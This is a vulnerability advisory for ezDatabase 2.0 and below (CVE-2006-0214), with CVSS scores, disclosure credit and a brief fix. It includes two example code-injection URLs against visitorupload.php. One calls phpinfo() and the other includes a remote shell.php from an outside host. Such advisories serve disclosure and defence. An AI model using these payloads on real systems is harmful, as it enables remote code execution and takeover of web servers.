ezDatabase 2.0 and below

2006.01.14

Credit: Pridels Team

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-0214

CWE: N/A

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

ezDatabase 2.0 and below

ezDatabase 2.0 and below
=========================================
www.ezdatabase.org
"ezDatabase is the foundation for your online databases. It is a powerful web based application that allows even non-technical users to create online databases for their website. ezDatabase will do the hard work while you concentrate on building the databases you want."

______________________________________________
This vulnerability was first disclosed at:
www.unsecured-systems.com/forum/
By Pridels Team: pridels.blogspot.com

______________________________________________
Details:
This application insecurely uses variables in several ways.
Example:
visitorupload.php?db_id=;phpinfo()
visitorupload.php?db_id=;include(_GET[test])&test=http://www.unsecured-s
ystems.com/forum/shell.php

registered_globals = on OR off

Solution:
Rewrite the application to follow the guidelines of the PHP Security Consortium

At this time there are several more vulnerabilites that have only been disclosed at:
www.unsecured-systems.com/forum/

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

ezDatabase 2.0 and below

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

ezDatabase 2.0 and below

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.